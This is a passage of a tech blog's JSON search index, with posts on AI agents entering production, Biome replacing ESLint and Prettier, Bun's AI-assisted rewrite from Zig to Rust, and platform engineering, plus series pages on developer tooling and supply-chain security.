2026","externalUrl":null,"permalink":"/tags/testing/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Testing","type":"tags"},{"content":"For years, we\u0026rsquo;ve watched AI models get smarter. But here\u0026rsquo;s what\u0026rsquo;s actually happening right now: those models are breaking free from the chatbot box. They\u0026rsquo;re becoming agents — autonomous systems that reason, plan, and execute tasks without human intervention between steps. And that\u0026rsquo;s not just a research paper anymore. It\u0026rsquo;s shipping in production at the major cloud providers.\nLast month, AWS, Google Cloud, and Azure all released agentic frameworks and integrations. GitHub Copilot is spinning up autonomous agents for code generation. Every major LLM provider is now positioning \u0026ldquo;agent-ready\u0026rdquo; as a core feature. This isn\u0026rsquo;t hype. This is infrastructure that works.\nWhat Makes a System an Agent # Before we go further, let me be clear about what we\u0026rsquo;re talking about. An agent isn\u0026rsquo;t just an API call that returns an answer. It\u0026rsquo;s a system that can:\nObserve the current state of a problem Plan a sequence of steps to solve it Execute those steps by calling tools (APIs, databases, other services) Adapt when things don\u0026rsquo;t go as expected The critical difference from a traditional chatbot is the feedback loop. A chatbot answers one question and hands it off to a human. An agent looks at its own output, decides whether the task is complete, and if not, loops back to try a different approach. This mirrors the autonomous reasoning we\u0026rsquo;ve seen with extended thinking models and reasoning-focused architectures that can handle multi-step problem solving.\nI\u0026rsquo;ve been in this field long enough to know the difference between genuine capability and marketing speak. What I\u0026rsquo;m seeing now is genuine. The agents being deployed today can actually handle real workflows — code generation with testing, customer support with system access, data analysis with query loops. They fail gracefully. They know when to escalate. How development practices are evolving shows this shift from manual tooling to agent-assisted automation. Computer use capabilities in AI agents demonstrate how agents are learning to interact with systems directly.\nWhy This Matters Now # This timing isn\u0026rsquo;t random. Three things had to converge.\nFirst, model quality crossed a threshold. GPT-4 and Claude weren\u0026rsquo;t the breakthrough just because they\u0026rsquo;re smarter at answering questions. They\u0026rsquo;re breakthrough because they can actually plan multi-step tasks and recover from mistakes. That\u0026rsquo;s the foundation everything else sits on. These reasoning advances are accelerating this capability, enabling agents to be applied across real development workflows.\nSecond, the tooling finally got mature enough. Function calling used to be fragile. Now it\u0026rsquo;s reliable. Frameworks like LangChain, CrewAI, and the cloud-native equivalents have solved the hard problems around context management, token budgeting, and error handling. GitHub Copilot agent mode represents a major milestone in developer-facing agentic tools.\nThird, organizations are desperate for this. The amount of time we waste on repetitive, multi-step work is genuinely stupid. A well-trained agent can execute half of what your operations team does in a day. That\u0026rsquo;s not speculation. That\u0026rsquo;s happening right now in companies I\u0026rsquo;ve worked with.\nThe Architecture Pattern Emerging # Here\u0026rsquo;s what I\u0026rsquo;m seeing across successful deployments:\nDefine the agent\u0026rsquo;s scope clearly. Not \u0026ldquo;solve any problem,\u0026rdquo; but \u0026ldquo;handle customer password resets with escalation rules\u0026rdquo; or \u0026ldquo;analyze logs and generate diagnostics.\u0026rdquo; Narrow domains work. General-purpose agents are still fantasy.\nBuild a robust tool layer. The quality of your APIs and database queries directly determines whether your agent succeeds or fails. If your tools are messy, your agent will be messy. Modern platform engineering patterns center on agent-ready architectures and autonomous system support.\nImplement guardrails. Cost limits, action validation, human approval gates for critical operations. Agents without guardrails will happily spend your entire budget or execute something dangerous. I\u0026rsquo;ve seen both happen. This is where cloud cost optimization and FinOps becomes essential for preventing runaway agent costs.\nMonitor the loops. Log every reasoning step, every tool call, every decision. When something goes wrong — and it will — you need visibility into exactly what the agent was thinking. Observability of complex systems has become far more practical. For teams building in regulated environments, comprehensive logging is a compliance requirement, not optional.\nThe Real Challenges # To be fair, this isn\u0026rsquo;t a solved problem yet. The challenges I\u0026rsquo;m seeing in production:\nConsistency is still hard. Agents will sometimes take wildly different approaches to the same problem on different runs. That\u0026rsquo;s fine for exploratory tasks. It\u0026rsquo;s a nightmare for compliance-heavy domains.\nCost can explode fast. Multiple reasoning loops with large context windows add up. We\u0026rsquo;re talking thousands of dollars per day if you\u0026rsquo;re not careful. The economics haven\u0026rsquo;t stabilized yet. Cloud FinOps strategies become critical when deploying agents at scale. Understanding cost management patterns is essential for sustainable agent deployments.\nHallucination is still real, even at the frontier. An agent might confidently try to call a function that doesn\u0026rsquo;t exist, or misinterpret the output of one that does. AI-assisted testing frameworks help validate agent behavior before production deployment.\nIntegration with legacy systems is its own circle of hell. Modern APIs make this easy. Everything else is a custom integration project.\nBut here\u0026rsquo;s the thing: these are engineering problems, not physics problems. We know how to solve them. Some of them are just expensive or slow. That\u0026rsquo;s where robust infrastructure and platform design come in — building the systems that allow agents to run reliably at scale.\nSub-Hub: Agent Systems Architecture Patterns # For deeper exploration of how to design and build reliable agent systems, see Agent Systems Architecture Patterns. This sub-hub covers reasoning loops, tooling integration, observability, cost management, and governance patterns that make agents work in production.\nMy Take # AI agents aren\u0026rsquo;t the future. They\u0026rsquo;re happening right now. The question for your organization isn\u0026rsquo;t whether agents are real — they are. The question is: which of your workflows are safe to hand over, and what are you going to build with the time you save?\nThe shift isn\u0026rsquo;t just technical. It\u0026rsquo;s architectural. We\u0026rsquo;re moving from request-response systems to autonomous decision-making systems. That means your APIs, your databases, and your monitoring all need to think in terms of \u0026ldquo;what happens when this runs without a human in the loop?\u0026rdquo;\nThe teams that figure this out first will have a meaningful competitive advantage. The next inflection point isn\u0026rsquo;t in the models. It\u0026rsquo;s in the infrastructure we build around them. Governance frameworks and compliance requirements around autonomous systems will shape how we build responsibly. Observability and monitoring for agent systems are essential from day one.\n","date":"26 May 2026","externalUrl":null,"permalink":"/posts/260526-rise-of-agent-based-systems/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"AI agents are moving from research labs into production systems, fundamentally changing how we architect software for autonomous decision-making and execution.","title":"The Rise of Agent-Based Systems in Software Development — From Concept to Production","type":"posts"},{"content":"When I first benchmarked Biome against my team\u0026rsquo;s existing ESLint + Prettier setup, I thought the numbers were a measurement error. Forty seconds down to four hundred milliseconds. That\u0026rsquo;s not a performance improvement — that\u0026rsquo;s a magnitude shift. And it\u0026rsquo;s making me rethink what we should accept from our developer tools in 2026.\nThe ESLint and Prettier Tax # Let\u0026rsquo;s be honest about what we\u0026rsquo;ve normalized. A typical modern JavaScript project runs linting and formatting on save, on commit, and in CI. Each pass takes 30–40 seconds on a medium-sized codebase. Multiply that across a team of ten people running linters 3–4 times per day, and you\u0026rsquo;re burning through thousands of developer-hours per year on waiting for tools to finish.\nThis isn\u0026rsquo;t new pain — it\u0026rsquo;s just old pain we\u0026rsquo;ve stopped questioning. ESLint and Prettier are foundational tools. They\u0026rsquo;re battle-tested, well-documented, and everywhere. But they were built in an era when \u0026ldquo;good enough\u0026rdquo; meant \u0026ldquo;finishes in 30 seconds.\u0026rdquo; The JavaScript ecosystem has momentum, and momentum is hard to redirect.\nEnter Biome # Biome is a single tool written in Rust that handles linting, formatting, and import sorting in one pass. No chaining. No dual configuration files. One command, one configuration object, one mental model.\nThe performance is aggressive. Biome processes the same codebase in 300–400 milliseconds. That\u0026rsquo;s not a marginal win — that\u0026rsquo;s the difference between \u0026ldquo;instant\u0026rdquo; and \u0026ldquo;perceptible.\u0026rdquo; Your linter feedback on save becomes synchronous with your editor keystroke. Formatting becomes something you don\u0026rsquo;t wait for.\nThe architecture is unified in a way that matters. ESLint and Prettier live in separate tools with overlapping concerns. You configure them separately, they parse the code separately, and they sometimes conflict with each other (which is why every ESLint + Prettier setup adds a compatibility layer). Biome eliminates that friction entirely. It lints and formats in one pass, with a single rule set.\nThe Real Problem: Not All Rules Migrate # Here\u0026rsquo;s where the honest take comes in: Biome is not a drop-in replacement. If you rely on specific ESLint plugins — like eslint-plugin-react, eslint-plugin-vue, or custom rule sets your team built — you won\u0026rsquo;t find exact equivalents in Biome. Biome ships with sensible defaults for JavaScript, TypeScript, JSX, and JSON, but it\u0026rsquo;s opinionated. It will not replicate every rule in every plugin ecosystem.\nThis is both a strength and a friction point. The strength: Biome\u0026rsquo;s rule set was designed by people who thought about what actually matters, rather than accumulated from fifteen years of third-party contributions. The friction: if your setup includes rules from three different plugins, migrating to Biome involves trade-offs.\nFor most teams, that trade-off is worth it. The rules you lose are rarely the ones you\u0026rsquo;d die for. The ones Biome provides are solid, well-reasoned, and often better than the alternatives. But for teams with heavily customized ESLint setups, this is a real migration cost.\nWhat This Signals About JavaScript Tooling # Biome didn\u0026rsquo;t invent the insight that JavaScript tooling had become bloated. The whole ecosystem has been moving in this direction: consolidation, rewrite in Rust, performance-first design. We\u0026rsquo;ve seen it with Esbuild (which replaced webpack/Parcel/Rollup in many workflows), with SWC (which replaced Babel), and with Turbopack (which aims to replace webpack entirely).\nThis mirrors what\u0026rsquo;s happening in the JavaScript runtime space itself, where Rust-based runtimes like Deno and Bun are reshaping the landscape. The Rust rewrite of Bun\u0026rsquo;s core demonstrates the same pattern: performance, memory safety, and developer experience become table stakes when you redesign from first principles. The same consolidation trend is visible in Python\u0026rsquo;s tooling evolution where consolidated tools are replacing fragmented ecosystems.\nThere\u0026rsquo;s a pattern here. The JavaScript ecosystem accumulated best practices, good intentions, and performance compromises. Then people wrote new tools in Rust, designed them from scratch to be fast, and discovered that velocity matters more than perfect compatibility with legacy plugins.\nBiome is the next domino. I expect that within 18 months, ESLint and Prettier will feel like Webpack felt in 2020 — technically still used, but no longer the default choice for new projects. When frameworks and runtimes like Deno 2.3 ship with Biome built-in, the shift accelerates.\nThe Migration Path Is Real, Not Hypothetical # I\u0026rsquo;ve migrated a 50,000-line JavaScript codebase to Biome. Here\u0026rsquo;s what that looked like:\nInstall Biome — npm install -D @biomejs/biome Initialize config — npx biome init (generates a sensible starting point) Adjust rules — your team\u0026rsquo;s linting philosophy probably overlaps with Biome\u0026rsquo;s defaults by 80–90% Migrate CI — replace your lint and format scripts Remove old tools — npm uninstall eslint prettier eslint-config-* (and you\u0026rsquo;ll see your node_modules shrink) The first pass usually surfaces a few rules you want to disable or adjust. That takes an hour or two. The formatting changes are automatic. You run biome check --write once, commit the diff, and move forward.\nThe real migration cost isn\u0026rsquo;t technical — it\u0026rsquo;s social. Your team\u0026rsquo;s linting philosophy might have opinions that Biome doesn\u0026rsquo;t share. That\u0026rsquo;s a conversation to have, not a blocker.\nMy Take # I think Biome is the right call for new projects starting today, and a worthwhile migration for existing codebases. The performance difference alone justifies it — synchronous linter feedback on save is not a luxury, it\u0026rsquo;s table stakes. But the real win is simplicity: one tool, one configuration, one rule set, one community.\nESLint and Prettier served us well. They solved real problems in a world where JavaScript performance meant \u0026ldquo;finished within 30 seconds.\u0026rdquo; But Biome points to where the ecosystem is going: fast, opinionated, and unified. The JavaScript ecosystem has a habit of consolidating around tools that get the fundamentals right. Biome got them right.\nThe next question isn\u0026rsquo;t \u0026ldquo;should I migrate to Biome?\u0026rdquo; It\u0026rsquo;s \u0026ldquo;what else am I running as two separate tools that should be one?\u0026rdquo; This consolidation pattern is becoming the norm across the developer experience, from AI-assisted testing frameworks that integrate multiple concerns into unified workflows to build tools that combine multiple phases into single passes.\n","date":"21 May 2026","externalUrl":null,"permalink":"/posts/260521-biome-eslint-prettier-killer/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Biome replaces ESLint, Prettier, and half your build pipeline with a single Rust-based tool 100x faster — and it’s already becoming the default choice.","title":"Biome — The ESLint and Prettier Killer","type":"posts"},{"content":" Overview # A developer\u0026rsquo;s productivity and code quality are fundamentally shaped by the tools they use. This series tracks the evolution of development tooling—from IDEs and code editors to build systems, testing frameworks, and CI/CD platforms. We also cover the rapidly evolving landscape of AI coding assistants, observability tools, and how automation is reshaping what development means.\nThe right tools amplify developer capability; the wrong tools create friction and hide problems.\nWhat You\u0026rsquo;ll Find Here # IDE \u0026amp; Editor Evolution: How VS Code, JetBrains IDEs, and emerging editors continue to innovate—extensions, language support, and the rise of AI-powered code completion.\nBuild System \u0026amp; Package Management: Modern build tools like Turbopack, Rspack, and package managers addressing speed, resolution, and reproducibility.\nTesting Infrastructure: Test runners, coverage tools, mocking frameworks, and how continuous testing integrates into the development loop.\nCI/CD Platforms: GitHub Actions, GitLab CI, cloud-native CI/CD, and how automation reshapes deployment practices.\nAI Coding Assistants: GitHub Copilot, Claude, ChatGPT, and how AI changes code writing, debugging, and pair programming dynamics.\nObservability \u0026amp; Debugging: Better debugging tools, profilers, monitoring, and how developers understand system behavior in production.\nLearning Path # Understand modern development workflow — how IDEs, VCS, and automation fit together Evaluate build tooling — what matters in build performance, reproducibility, and monorepo support Build effective testing practices — types of tests, coverage strategies, and continuous testing pipelines Master CI/CD automation — from basic build/test/deploy to sophisticated multi-environment deployments Adopt AI tools effectively — understanding where AI coding assistants amplify productivity and where they introduce risk Key Technologies Covered # Editors/IDEs: VS Code, JetBrains IDEs, Neovim, and specialized editors Build Systems: Turbopack, Rspack, esbuild, Vite, Webpack, Gradle, Cargo Package Managers: npm, yarn, pnpm, Cargo, pip, and language-specific alternatives Testing: Vitest, Jest, Playwright, Cypress, Go testing, and polyglot test frameworks CI/CD: GitHub Actions, GitLab CI, CircleCI, Cloud Build, and container-native approaches AI Assistants: GitHub Copilot, Anthropic Claude, and emerging coding models Observability: Debugging tools, profilers, APM platforms, and structured logging Related Series # Explore complementary areas: JavaScript \u0026amp; Node.js (tooling specific to the JavaScript ecosystem), AI Models \u0026amp; Releases (foundation models powering coding assistants)\n","date":"21 May 2026","externalUrl":null,"permalink":"/series/developer-tooling/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Developer Tooling","type":"series"},{"content":"","date":"21 May 2026","externalUrl":null,"permalink":"/tags/javascript/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"JavaScript","type":"tags"},{"content":"","date":"21 May 2026","externalUrl":null,"permalink":"/tags/open-source/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Open Source","type":"tags"},{"content":"","date":"21 May 2026","externalUrl":null,"permalink":"/tags/typescript/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"TypeScript","type":"tags"},{"content":"On May 14, 2026, Jarred Sumner merged PR #30412 into Bun\u0026rsquo;s main branch. The title is straightforward: \u0026ldquo;Rewrite Bun in Rust.\u0026rdquo; The diff is not — 1,009,257 lines added, 4,024 deleted, 2,188 files changed across 6,755 commits. In roughly one week, the Bun runtime went from being one of the most prominent Zig codebases in production to a Rust project.\nThis is one of those moments that reshapes the conversation around JavaScript runtimes, language choice, and — whether you like it or not — AI-assisted development at scale.\nThe Background # Bun launched in 2022 as an all-in-one JavaScript runtime, bundler, package manager, and test runner. Its big differentiator was performance, and its implementation language was Zig — a systems language designed as a pragmatic alternative to C and C++. Zig gave Bun low-level control without the complexity of Rust\u0026rsquo;s borrow checker, and it was a deliberate choice by Jarred Sumner at the time.\nThis rewrite is the latest chapter in the JavaScript runtime wars, where Deno, Node.js, and Bun are constantly innovating to stay competitive. Understanding the broader landscape helps explain why a team would undertake such a massive technical overhaul. Similar language and architecture decisions are unfolding across the tech stack, from Python\u0026rsquo;s free-threading initiatives to Go ecosystem evolution, where performance and memory safety drive strategic rewrites.\nBut Zig also meant manual memory management. No compiler enforcing lifetimes. No borrow checker catching use-after-free bugs at compile time. For a small, fast-moving team building a runtime that handles untrusted user code, that trade-off became increasingly painful. This follows the same reasoning we\u0026rsquo;ve seen with Rust adoption in the Linux kernel — memory safety is worth the complexity cost when security matters.\nAs Jarred put it in the PR description:\n\u0026ldquo;Most importantly, we now have compiler-assisted tools for catching \u0026amp; preventing memory bugs, which have costed the team an enormous amount of development \u0026amp; debugging time over the years.\u0026rdquo;\nThat\u0026rsquo;s the kind of sentence that only comes after years of late-night debugging sessions.\nWhat Actually Changed # This was a faithful port, not an architectural overhaul. The Rust version keeps the same architecture, the same data structures, and the same approach to minimizing third-party dependencies. Notably, there\u0026rsquo;s no async Rust — Bun continues to use its own event loop and concurrency model rather than adopting Tokio or similar frameworks.\nThe preparation was methodical. Before the actual rewrite began, the team committed a detailed Zig-to-Rust porting guide that maps Zig idioms to their Rust equivalents. Internal smart pointer types were pre-mapped to Rust counterparts. A bun_collections Rust crate was already in place. This wasn\u0026rsquo;t a spontaneous decision — the groundwork was laid carefully.\nThe concrete results:\nBinary size shrinks by 3–8 MB depending on platform Benchmarks are \u0026ldquo;between neutral and faster\u0026rdquo; according to the PR The rewrite fixes several existing memory leaks and flaky tests 99.8% test suite compatibility on Linux x64 glibc before merge The AI in the Room # Let\u0026rsquo;s talk about the branch name: claude/phase-a-port. That\u0026rsquo;s not subtle. Claude, Anthropic\u0026rsquo;s AI model, was heavily involved in the actual code translation. Given that Bun is now part of Anthropic\u0026rsquo;s portfolio, this is as much a showcase of AI-assisted development as it is a runtime upgrade.\nThe timeline makes this clear. Jarred first floated the idea publicly around May 5, describing it as experimental:\n\u0026ldquo;I\u0026rsquo;m curious to see what a working version looks like, what it feels like, how it performs and if/how hard it\u0026rsquo;d be to get it to pass Bun\u0026rsquo;s test suite and be maintainable.\u0026rdquo;\nHe also added:\n\u0026ldquo;There\u0026rsquo;s a very high chance all this code gets thrown out completely.\u0026rdquo;\nOne week later, it was merged. A million lines of Rust, passing the full test suite.\nWhether you\u0026rsquo;re impressed or skeptical, this is worth paying attention to. Translating a codebase 1:1 between two systems languages — with detailed porting guides as context — is arguably the sweet spot for current LLM capabilities. It\u0026rsquo;s repetitive, pattern-heavy work where the source and target languages have similar levels of abstraction. It\u0026rsquo;s very different from asking an AI to design an architecture from scratch. This echoes what we\u0026rsquo;ve seen with Claude\u0026rsquo;s in-context learning capabilities — when the task is pattern-matching with clear context, modern AI can execute at scale. The same principles apply to AI-assisted testing and code quality, where AI works best on well-structured, pattern-heavy tasks with clear requirements.\nCommunity Reaction: Polarized # The GitHub PR tells its own story through the reaction counts: 1,254 thumbs up and 1,010 thumbs down. That\u0026rsquo;s an unusually polarized ratio for a merged PR from a project\u0026rsquo;s creator.\nOn Hacker News, the discussion was massive. The merge announcement pulled in 652 points and 724 comments. An earlier thread about the Zig-to-Rust porting guide hit 722 points with 554 comments. The 99.8% test compatibility announcement got 716 points and 692 comments.\nThe skepticism falls into a few camps:\n\u0026ldquo;One week is misleading.\u0026rdquo; Several commenters pointed out the extensive preparation — the porting guide, the pre-mapped types, the bun_collections crate. As one Hacker News user put it: \u0026ldquo;When announcements say that rewrite took 1 week, I wonder how much time went into preparing this file with very detailed instructions on mapping Zig to Rust idioms.\u0026rdquo;\n\u0026ldquo;This is marketing for Anthropic.\u0026rdquo; With Bun now under Anthropic\u0026rsquo;s umbrella, the rewrite doubles as a proof-of-concept for Claude\u0026rsquo;s coding capabilities. Some community members questioned whether the narrative was being shaped to serve that purpose.\n\u0026ldquo;AI-generated code at this scale is concerning.\u0026rdquo; A million lines of AI-translated Rust is a lot of code that no human has read line by line. The test suite passes, but test suites don\u0026rsquo;t catch everything — especially subtle concurrency bugs or edge cases in memory management that might only surface under specific workloads. Agent-based systems for code verification might eventually help catch these edge cases, but we\u0026rsquo;re not there yet.\nOn the other side, plenty of developers see this as pragmatic. Memory safety matters. Rust\u0026rsquo;s ecosystem is mature. And if AI can handle the mechanical translation while humans focus on architecture and correctness, that\u0026rsquo;s arguably a better use of everyone\u0026rsquo;s time.\nWhat This Means for the Runtime Landscape # The JavaScript runtime space now has an interesting dynamic:\nNode.js: C++ core, the incumbent, massive ecosystem Deno: Rust core (from the start), TypeScript-first, security-focused Bun: Now Rust core (migrated from Zig), performance-focused, all-in-one Two out of three major runtimes are now built on Rust. That\u0026rsquo;s a strong signal about where the industry is landing on the systems programming language question for this class of software. It also means Bun and Deno now share a compilation target, which could eventually lead to shared libraries or tooling.\nIf you\u0026rsquo;re interested in the broader context of where these runtimes are heading, I\u0026rsquo;ve explored the JavaScript runtime landscape in depth, and the shifts in Deno 2.3 and the runtime wars provide important context for understanding why memory safety and performance matter so much to the ecosystem right now.\nFor existing Bun users, the migration should be transparent. The rewrite is available via bun upgrade --canary, and the team has been clear that it won\u0026rsquo;t ship as a stable release until the remaining optimization and cleanup work is done. If you\u0026rsquo;re interested in the practical implications for local development, Docker\u0026rsquo;s Model Runner integration now works with Bun as your runtime, which opens up interesting possibilities for local AI development.\nMy Take # I think the Rust rewrite is the right call for Bun\u0026rsquo;s long-term health. Memory safety bugs in a JavaScript runtime aren\u0026rsquo;t just developer inconveniences — they\u0026rsquo;re potential security vulnerabilities that affect everyone running Bun in production. The borrow checker catches entire categories of bugs that manual auditing misses.\nThe AI angle is the more interesting conversation. One week to port a million lines is genuinely remarkable, but let\u0026rsquo;s be honest about what \u0026ldquo;port\u0026rdquo; means here. This was a mechanical translation with detailed instructions, not a creative engineering effort. The hard work — the architecture, the algorithms, the test suite — was already done. That doesn\u0026rsquo;t diminish the achievement, but it does scope it accurately.\nWhat I\u0026rsquo;m watching for: how the Rust version evolves after the initial port. The real test isn\u0026rsquo;t whether AI can translate Zig to Rust. It\u0026rsquo;s whether the resulting Rust codebase is idiomatic enough that human developers can maintain and extend it without fighting the code. A faithful port preserves behavior, but it doesn\u0026rsquo;t always preserve readability.\nThe 1,010 thumbs-down reactions on the PR are worth taking seriously too. When roughly half the community pushes back on a technical decision, it usually means something beyond \u0026ldquo;I don\u0026rsquo;t like Rust.\u0026rdquo; In this case, I think it reflects a broader anxiety about the pace of AI-driven changes in open-source projects and about Anthropic\u0026rsquo;s influence on a tool many developers depend on.\nEither way, the JavaScript runtime wars just got more interesting. Bun ships with memory safety guarantees now, and the bar for every runtime in the space just went up.\n","date":"15 May 2026","externalUrl":null,"permalink":"/posts/260515-bun-rust-rewrite/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Bun just merged a massive PR rewriting its core from Zig to Rust — over a million lines changed in roughly a week. Here’s what happened, why it matters, and what the community thinks about an AI-assisted rewrite of an entire JavaScript runtime.","title":"Bun Rewrites Its Core in Rust — What It Means for the JavaScript Runtime Wars","type":"posts"},{"content":"","date":"15 May 2026","externalUrl":null,"permalink":"/tags/developer-tooling/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Developer Tooling","type":"tags"},{"content":"","date":"15 May 2026","externalUrl":null,"permalink":"/tags/devops/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"DevOps","type":"tags"},{"content":"","date":"15 May 2026","externalUrl":null,"permalink":"/series/javascript--node.js/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"JavaScript \u0026 Node.js","type":"series"},{"content":"","date":"15 May 2026","externalUrl":null,"permalink":"/categories/open-source/","section":"Blog Categories: AI, Security, Development \u0026 Infrastructure","summary":"","title":"Open Source","type":"categories"},{"content":"","date":"15 May 2026","externalUrl":null,"permalink":"/tags/platform-engineering/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Platform Engineering","type":"tags"},{"content":"Platform engineering has matured from a buzzword to a discipline, and the best teams are treating their platforms as products. The shift from \u0026ldquo;give developers raw infrastructure access\u0026rdquo; to \u0026ldquo;provide curated, opinionated abstractions\u0026rdquo; has transformed how organizations scale.\nThe Product Mindset # Platform engineering in 2025 represents a shift in thinking. Instead of building platforms as side projects, successful teams treat them as products with their own roadmaps, user research, and iteration cycles. Developers are customers, and the job is to serve them.\nThis means understanding what developers actually need to do their jobs. Golden paths that embed best practices save developers from making poor decisions. Documentation that\u0026rsquo;s usable, not just comprehensive, matters enormously. And feedback loops — understanding how developers use your platform and where they struggle — are essential.\nInternal Developer Platforms and Abstractions # The rise of Backstage and similar developer portals provides a front door to your platform. But the real work happens in the layers beneath: how you abstract infrastructure, how you enforce policy, and how you provide self-service capabilities.\nKubernetes often forms the foundation for these platforms, but developers shouldn\u0026rsquo;t need to understand Kubernetes. They should declare what they need, and the platform provides it. This requires building abstractions that are opinionated enough to be useful but flexible enough to handle the exceptions.\nInfrastructure as Code and Declarative Approaches # Managing infrastructure declaratively — treating it like code — is table stakes. OpenTofu provides a solid foundation for teams starting from scratch or migrating away from Terraform\u0026rsquo;s licensing constraints. The community fork has demonstrated its ability to innovate independently.\nFor teams already deep in Kubernetes, OpenTofu\u0026rsquo;s maturity provides good alternatives to proprietary tools. The key is consistency: pick an approach, standardize on it, and version-control your infrastructure like you do your application code.\nObservability as a Platform Concern # You can\u0026rsquo;t manage what you can\u0026rsquo;t observe. OpenTelemetry\u0026rsquo;s maturity means you have standard patterns for logging, metrics, and tracing. Your platform should provide these capabilities by default, not as an afterthought.\nThis means instrumenting your platform itself — giving operators visibility into platform health, developer workflows, and infrastructure efficiency. Cost monitoring and FinOps become possible with good observability.\nMoving Beyond Manual Operations # Platform engineering practices are increasingly incorporating AI-assisted operations. Rather than having platform engineers manually respond to issues, tools are beginning to handle routine tasks with human oversight.\nAI-assisted testing validates infrastructure changes before they reach production. In-context learning approaches let platforms document themselves in ways that AI systems can reason over. The platform itself becomes more autonomous.\nSupporting Modern Workloads # Modern platforms need to support diverse workloads: containerized services, serverless functions, batch jobs, and increasingly, AI/ML inference. Kubernetes handles most of these well, but the platform layer needs to expose them through consistent abstractions.\nThis means thinking about how developers declare infrastructure needs regardless of underlying implementation. A database? The platform provisions it. A job queue? Same pattern. This consistency is what makes platforms truly valuable.\nSecurity and Compliance by Default # Good platforms enforce security and compliance policies by default rather than relying on developers to think about them. Policy-as-code approaches baked into your platform ensure that standards are followed without manual review in every case.\nThis is especially important as organizations increasingly need to comply with regulations like the EU AI Act. The platform can enforce documentation, testing, and monitoring requirements transparently.\nAI Integration and Agent-Readiness # As agent-based systems become more common, platforms need to be designed with autonomous decision-making in mind. This means clear APIs, good error messages, and the ability for agents to understand what actions are available and their consequences.\nGitHub Copilot\u0026rsquo;s agent mode shows what this looks like in developer tools. Platforms should aspire to be similarly agent-ready.\nCost Optimization and Efficiency # Platforms have enormous leverage over organizational infrastructure costs. Cloud cost optimization isn\u0026rsquo;t just about picking cheap resources — it\u0026rsquo;s about helping developers make good decisions about what resources they actually need.\nProviding visibility into costs, encouraging right-sizing, and automating scaling decisions all compound to significant savings. And as infrastructure costs continue to grow, this expertise becomes increasingly valuable.\nBuilding vs. Buying vs. Composing # The era of \u0026ldquo;build everything\u0026rdquo; has ended. The best platforms are composed from open-source projects (Kubernetes, OpenTofu, Cilium, ArgoCD) with internal tooling to integrate them and provide the abstractions your organization needs.\nThis approach — composition over construction — lets you focus on what\u0026rsquo;s unique to your organization rather than reinventing infrastructure components.\nMy Take # Platform engineering is table stakes for organizations at scale. The question isn\u0026rsquo;t whether to do it, but how well you do it. The teams that succeed are treating their platforms as products, investing in developer experience, and building observability and automation from the start.\nThe shift toward AI-assisted operations will accelerate. Platforms that are well-instrumented and well-designed for automation will compound their advantages. Those that are ad hoc collections of scripts will find themselves increasingly behind.\nThe next inflection point is probably agent-ready platforms — infrastructure that developers can declare through natural language, reviewed by autonomous systems, and deployed with human oversight. That\u0026rsquo;s not far away.\n","date":"15 May 2026","externalUrl":null,"permalink":"/posts/260515-platform-engineering-devops-practices/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Platform engineering moves from infrastructure operations to building delightful developer experience. Learn the patterns that work.","title":"Platform Engineering \u0026 DevOps Practices — Building Developer Experience Platforms","type":"posts"},{"content":"","date":"15 May 2026","externalUrl":null,"permalink":"/tags/rust/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Rust","type":"tags"},{"content":"","date":"12 May 2026","externalUrl":null,"permalink":"/tags/node.js/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Node.js","type":"tags"},{"content":" Overview # Modern software depends on hundreds of dependencies. Each one is a potential attack vector into your application. This series covers software supply chain security—from understanding dependency vulnerabilities and malicious packages to securing your build pipeline, implementing signing and verification, and building resilient dependency management practices.\nSupply chain attacks are increasing in sophistication, but a solid foundation in understanding the risks and adopting security practices can dramatically reduce exposure.\nWhat You\u0026rsquo;ll Find Here # Dependency Vulnerabilities: How to find, understand, and prioritize vulnerabilities in your dependencies. Not all CVEs are equally important; context matters.\nMalicious Packages: How bad actors inject malicious code into popular packages, what signs to look for, and how ecosystems are fighting back.\nPackage Manager Security: Understanding npm, PyPI, Cargo, Maven Central, and how package managers verify authenticity and integrity.\nBuild Pipeline Security: Securing CI/CD systems, artifact signing and verification, SBOM generation, and audit trails.\nDependency Management: Strategies for keeping dependencies up to date, managing multiple versions, and knowing what you\u0026rsquo;re running in production.\nEcosystem Initiatives: SBOMs, package signing, trusted registries, and how the industry is raising baseline security.\nLearning Path # Understand supply chain risks — what attacks look like and what makes dependencies vulnerable Master dependency management — tools, processes, and strategies for keeping dependencies secure and current Implement build security — securing CI/CD, artifact verification, and audit trails Learn to assess risk — prioritizing which vulnerabilities matter and which are noise Build organizational practices — policies around dependency vetting, update cadence, and incident response Key Topics Covered # Vulnerability Management: CVE databases, severity assessment, patching strategies, and monitoring tools Malicious Code Detection: Code review practices, automated scanning, behavior analysis, and community signals Package Manager Security: Trusted registries, cryptographic signing, provenance verification, and namespace squatting Build Security: CI/CD hardening, artifact signing, SBOM generation, and secure secret management Dependency Tools: Dependabot, Snyk, Renovate, pip-audit, cargo-audit, and polyglot tools Ecosystem Standards: OpenSSF best practices, SBOMs, VEX, and supply chain validation frameworks Related Series # Explore complementary areas: Cybersecurity Landscape (broader security practices), Breaches \u0026amp; Zero-Days (analyzing actual supply chain incidents)\n","date":"12 May 2026","externalUrl":null,"permalink":"/series/supply-chain-security/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Supply Chain Security","type":"series"},{"content":"","date":"12 May 2026","externalUrl":null,"permalink":"/tags/supply-chain-security/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Supply Chain 